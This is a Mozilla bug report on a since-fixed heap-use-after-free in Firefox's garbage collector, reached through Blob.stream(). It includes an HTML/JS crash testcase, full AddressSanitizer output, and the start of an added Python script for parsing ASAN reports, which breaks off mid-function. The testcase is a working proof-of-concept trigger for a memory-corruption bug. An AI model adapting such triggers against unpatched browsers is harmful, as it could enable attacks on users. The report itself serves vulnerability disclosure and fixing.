Closed Bug 1563179 Opened 6 years ago Closed 6 years ago

heap-use-after-free in GC with Blob.stream

Categories

(Core :: DOM: File, defect)

Version: 69 Branch
Type: defect
Priority: Not set
Severity: normal

Tracking

RESOLVED DUPLICATE of bug 1562891
Tracking Status
firefox69 --- fixed

People

(Reporter: nils, Unassigned)

References

(Regression)

Details

(4 keywords, Whiteboard: [adv-main69-])

Attachments

(2 files)

The following testcase crashes the latest ASAN build of Firefox 69.0a1 (SourceStamp=42a9ef2a777fb841ab9918e10e2629902c7bd28e). It requires a fuzzing build (--enable-fuzzing) and the pref user_pref("fuzzing.enabled",true).

crash.html:
<script>
function start() {
reloadurl=location.href;
o250=new Blob([undefined], {'type': 'image/svg+xml'});
document.location.hash='id4';
// Blob.stream() is where the ASAN "previously allocated" stack points (mozilla::dom::Blob::Stream).
o51=o250['stream']();
// Drop the only JS references so both objects become collectable.
o250=null;
o51=null;
// Force GC and CC passes: per the trace the object is freed by the cycle collector (SnowWhiteKiller)
// and then read again while the GC traces native gray roots.
FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
// Reload the page after 400 ms so the testcase repeats.
window.top.setTimeout("window.top.location.href='"+reloadurl+"'",400);
}
</script>
<body onload="start()"></body>

ASAN output:

==22790==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030002b8d18 at pc 0x7f0b3b716ec3 bp 0x7ffe26e817c0 sp 0x7ffe26e817b8
READ of size 8 at 0x6030002b8d18 thread T0 (file:// Content)
#0 0x7f0b3b716ec2 in operator bool /builds/worker/workspace/build/src/obj-firefox/dist/include/js/RootingAPI.h:339:56
#1 0x7f0b3b716ec2 in TraceEdge<JSObject*> /builds/worker/workspace/build/src/obj-firefox/dist/include/js/TracingAPI.h:391
#2 0x7f0b3b716ec2 in JsGcTracer::Trace(JS::Heap<JSObject*>*, char const*, void*) const /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:961
#3 0x7f0b3b6f30f9 in mozilla::CycleCollectedJSRuntime::TraceNativeGrayRoots(JSTracer*) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:1000:13
#4 0x7f0b4bd8c7b1 in markGrayRoots<js::gc::SweepGroupZonesIter> /builds/worker/workspace/build/src/js/src/gc/GC.cpp:4703:7
#5 0x7f0b4bd8c7b1 in js::gc::GCRuntime::markGrayReferencesInCurrentGroup(js::FreeOp*, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:5534
#6 0x7f0b4be05f5e in sweepaction::SweepActionSequence<js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&>::run(js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:6545:23
#7 0x7f0b4be075b7 in sweepaction::SweepActionRepeatFor<js::gc::SweepGroupsIter, JSRuntime*, js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&>::run(js::gc::GCRuntime*, js::FreeOp*, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:6605:19
#8 0x7f0b4bd9df2b in js::gc::GCRuntime::performSweepActions(js::SliceBudget&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:6777:24
#9 0x7f0b4bda3762 in js::gc::GCRuntime::incrementalSlice(js::SliceBudget&, JS::GCReason, js::gc::AutoGCSession&) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7306:11
#10 0x7f0b4bda6547 in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7686:3
#11 0x7f0b4bda9ab8 in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7866:9
#12 0x7f0b4bdb389a in gc /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7954:3
#13 0x7f0b4bdb389a in JS::NonIncrementalGC(JSContext*, JSGCInvocationKind, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:8792
#14 0x7f0b402b09fd in nsJSContext::GarbageCollectNow(JS::GCReason, nsJSContext::IsIncremental, nsJSContext::IsShrinking, long) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1137:5
#15 0x7f0b42cb2d08 in mozilla::dom::FuzzingFunctions_Binding::garbageCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:42:3
#16 0x7f0b4acd9e87 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
#17 0x7f0b4acd9e87 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
#18 0x7f0b4acba49e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
#19 0x7f0b4acba49e in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3088
#20 0x7f0b4aca3d68 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
#21 0x7f0b4acda98f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
#22 0x7f0b4acdcbb2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
#23 0x7f0b4b9697b8 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2661:10
#24 0x7f0b4298a4ce in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
#25 0x7f0b43c9dc6c in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#26 0x7f0b43c9dc6c in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
#27 0x7f0b43c4cfe9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1030:22
#28 0x7f0b43c4eeb7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1222:17
#29 0x7f0b43c2f7d1 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
#30 0x7f0b43c2f7d1 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
#31 0x7f0b43c2da06 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
#32 0x7f0b43c34774 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
#33 0x7f0b46c4439f in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
#34 0x7f0b49af20f3 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6683:20
#35 0x7f0b49af10e2 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6483:7
#36 0x7f0b49af6c17 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
#37 0x7f0b3e57f715 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
#38 0x7f0b3e57e30a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
#39 0x7f0b3e578950 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#40 0x7f0b3e57c1c5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
#41 0x7f0b3e57de54 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
#42 0x7f0b3bcb64b1 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
#43 0x7f0b3fe7ae28 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10712:18
#44 0x7f0b3fe7ae28 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10644
#45 0x7f0b3feb08d5 in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:7147:3
#46 0x7f0b3ffc97eb in applyImpl<mozilla::dom::Document, void (mozilla::dom::Document::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1124:12
#47 0x7f0b3ffc97eb in apply<mozilla::dom::Document, void (mozilla::dom::Document::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1130
#48 0x7f0b3ffc97eb in mozilla::detail::RunnableMethodImpl<mozilla::dom::Document*, void (mozilla::dom::Document::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1176
#49 0x7f0b3b93c9b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
#50 0x7f0b3b97d8fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
#51 0x7f0b3b985784 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
#52 0x7f0b3cd8de3f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
#53 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#54 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#55 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#56 0x7f0b4638bef3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
#57 0x7f0b4a9fbc9e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
#58 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#59 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#60 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#61 0x7f0b4a9fa7e1 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
#62 0x558655fd0fd3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
#63 0x558655fd0fd3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
#64 0x7f0b60910b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
#65 0x558655ef250c in _start (/home/nils/browser/firefox/firefox/firefox+0x4550c)

0x6030002b8d18 is located 24 bytes inside of 32-byte region [0x6030002b8d00,0x6030002b8d20)
freed by thread T0 (file:// Content) here:
#0 0x558655f9dba2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
#1 0x7f0b3b76a478 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
#2 0x7f0b3b76a478 in SnowWhiteKiller::Visit(nsPurpleBuffer&, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459
#3 0x7f0b3b73e0b3 in void nsPurpleBuffer::VisitEntries<SnowWhiteKiller>(SnowWhiteKiller&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:956:27
#4 0x7f0b3b73f7d8 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2624:14
#5 0x7f0b3dec6f3c in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
#6 0x7f0b3b9a1782 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:331:22
#7 0x7f0b3b97d8fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
#8 0x7f0b3b985784 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
#9 0x7f0b3cd8de3f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
#10 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#11 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#12 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#13 0x7f0b4638bef3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
#14 0x7f0b4a9fbc9e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
#15 0x7f0b3cc6533e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
#16 0x7f0b3cc6533e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
#17 0x7f0b3cc6533e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
#18 0x7f0b4a9fa7e1 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
#19 0x558655fd0fd3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
#20 0x558655fd0fd3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
#21 0x7f0b60910b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

previously allocated by thread T0 (file:// Content) here:
#0 0x558655f9df23 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
#1 0x558655fd2c8d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
#2 0x7f0b43d79324 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
#3 0x7f0b43d79324 in mozilla::dom::Blob::Stream(JSContext*, JS::MutableHandle<JSObject*>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/file/Blob.cpp:353
#4 0x7f0b4063a787 in mozilla::dom::Blob_Binding::stream(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Blob*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/BlobBinding.cpp:745:24
#5 0x7f0b433b2aa2 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3171:13
#6 0x7f0b4acd9e87 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
#7 0x7f0b4acd9e87 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
#8 0x7f0b4acba49e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
#9 0x7f0b4acba49e in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3088
#10 0x7f0b4aca3d68 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
#11 0x7f0b4acda98f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
#12 0x7f0b4acdcbb2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
#13 0x7f0b4b9697b8 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2661:10
#14 0x7f0b4298a4ce in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
#15 0x7f0b43c9dc6c in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
#16 0x7f0b43c9dc6c in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
#17 0x7f0b43c4cfe9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1030:22
#18 0x7f0b43c4eeb7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1222:17
#19 0x7f0b43c2f7d1 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
#20 0x7f0b43c2f7d1 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
#21 0x7f0b43c2da06 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
#22 0x7f0b43c34774 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
#23 0x7f0b46c4439f in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
#24 0x7f0b49af20f3 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6683:20
#25 0x7f0b49af10e2 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6483:7
#26 0x7f0b49af6c17 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
#27 0x7f0b3e57f715 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
#28 0x7f0b3e57e30a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
#29 0x7f0b3e578950 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#30 0x7f0b3e57c1c5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
#31 0x7f0b3e57de54 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
#32 0x7f0b3bcb64b1 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
#33 0x7f0b3fe7ae28 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10712:18
#34 0x7f0b3fe7ae28 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10644
#35 0x7f0b3feb08d5 in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:7147:3

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/js/RootingAPI.h:339:56 in operator bool
Shadow bytes around the buggy address:
0x0c068004f150: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c068004f160: fd fa fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c068004f170: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c068004f180: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c068004f190: fd fa fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
=>0x0c068004f1a0: fd fd fd[fd]fa fa 00 00 05 fa fa fa fd fd fd fa
0x0c068004f1b0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x0c068004f1c0: fd fd fa fa 00 00 00 01 fa fa fd fd fd fd fa fa
0x0c068004f1d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
0x0c068004f1e0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x0c068004f1f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==22790==ABORTING
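The report above is the raw sanitizer output; what a triager actually wants from it is the bug class, the access, and the first in-tree frame of each of the three stacks (access, free, allocation). The script below is an added example, not part of this bug or of Mozilla's tooling: it parses an AddressSanitizer report into those fields and applies one hand-written heuristic for the pattern seen here (object freed from nsCycleCollector.cpp, then read from the GC/CycleCollectedJSRuntime tracer). SAMPLE_REPORT is a trimmed copy of this bug's own frames embedded so the script runs offline; the function names (parse_asan_report, triage, classify), the NOISE_PATHS list and the heuristic are my assumptions, not anything ASAN or Gecko defines. It also accepts the "to the left of"/"to the right of" region wording ASAN uses for overflows, which this bug does not exercise.

```python
"""Triage helper for AddressSanitizer reports (added example; not Mozilla tooling)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: a trimmed copy of the frames from the report in this bug.
SAMPLE_REPORT = """\
==22790==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030002b8d18 at pc 0x7f0b3b716ec3 bp 0x7ffe26e817c0 sp 0x7ffe26e817b8
READ of size 8 at 0x6030002b8d18 thread T0 (file:// Content)
    #0 0x7f0b3b716ec2 in operator bool /builds/worker/workspace/build/src/obj-firefox/dist/include/js/RootingAPI.h:339:56
    #1 0x7f0b3b716ec2 in TraceEdge<JSObject*> /builds/worker/workspace/build/src/obj-firefox/dist/include/js/TracingAPI.h:391
    #2 0x7f0b3b716ec2 in JsGcTracer::Trace(JS::Heap<JSObject*>*, char const*, void*) const /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:961
    #3 0x7f0b3b6f30f9 in mozilla::CycleCollectedJSRuntime::TraceNativeGrayRoots(JSTracer*) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:1000:13

0x6030002b8d18 is located 24 bytes inside of 32-byte region [0x6030002b8d00,0x6030002b8d20)
freed by thread T0 (file:// Content) here:
    #0 0x558655f9dba2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f0b3b76a478 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
    #2 0x7f0b3b76a478 in SnowWhiteKiller::Visit(nsPurpleBuffer&, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459

previously allocated by thread T0 (file:// Content) here:
    #0 0x558655f9df23 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x558655fd2c8d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f0b43d79324 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f0b43d79324 in mozilla::dom::Blob::Stream(JSContext*, JS::MutableHandle<JSObject*>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/file/Blob.cpp:353

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/js/RootingAPI.h:339:56 in operator bool
"""


@dataclass
class Frame:
    index: int
    function: str   # symbol as printed, signature included
    location: str   # file:line:col, or a module+offset in parentheses


@dataclass
class AsanReport:
    pid: int
    bug_type: str
    address: str
    access: Optional[str] = None         # READ or WRITE
    access_size: Optional[int] = None
    offset: Optional[int] = None         # distance from the region boundary ASAN reports
    relation: Optional[str] = None       # "inside of", "to the left of", "to the right of"
    region_size: Optional[int] = None
    stacks: Dict[str, List[Frame]] = field(
        default_factory=lambda: {"access": [], "free": [], "alloc": []})


HEADER_RE = re.compile(r"==(\d+)==ERROR: AddressSanitizer: ([\w-]+) on address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread")
REGION_RE = re.compile(r"is located (\d+) bytes (inside of|to the left of|to the right of) (\d+)-byte region")
# Function text may contain spaces (signatures); the location is always the last token.
FRAME_RE = re.compile(r"^\s*#(\d+) 0x[0-9a-f]+ in (.+) (\S+)$")

# Assumed list of frames that never carry triage value: sanitizer runtime, allocator
# shims and inlined SpiderMonkey header helpers.
NOISE_PATHS = ("compiler-rt/lib/asan/", "/memory/mozalloc/", "/mozilla/cxxalloc.h", "/dist/include/js/")


def parse_asan_report(text: str) -> AsanReport:
    """Split a report into its header fields and its access/free/alloc stacks."""
    report: Optional[AsanReport] = None
    section = "access"  # the first stack printed is the faulting access
    for line in text.splitlines():
        m = HEADER_RE.search(line)
        if m:
            report = AsanReport(pid=int(m.group(1)), bug_type=m.group(2), address=m.group(3))
            continue
        if report is None:
            continue  # skip anything before the error header
        m = ACCESS_RE.match(line)
        if m:
            report.access, report.access_size = m.group(1), int(m.group(2))
            continue
        m = REGION_RE.search(line)
        if m:
            report.offset, report.relation, report.region_size = int(m.group(1)), m.group(2), int(m.group(3))
            continue
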